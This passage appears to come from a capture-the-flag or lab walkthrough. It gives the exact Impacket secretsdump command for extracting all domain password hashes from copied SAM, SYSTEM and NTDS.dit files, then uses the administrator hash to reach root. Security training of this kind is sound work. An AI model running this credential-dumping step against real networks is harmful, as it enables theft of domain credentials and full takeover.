The operation completed successfully.
Transfer the three files to your Kali machine, then process them with Impacket's secretsdump.py to extract all the domain hashes.
> python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam ./sam -system ./system -ntds ./ntds.dit local

With the domain administrator's hash you can read the root flag.

You are root.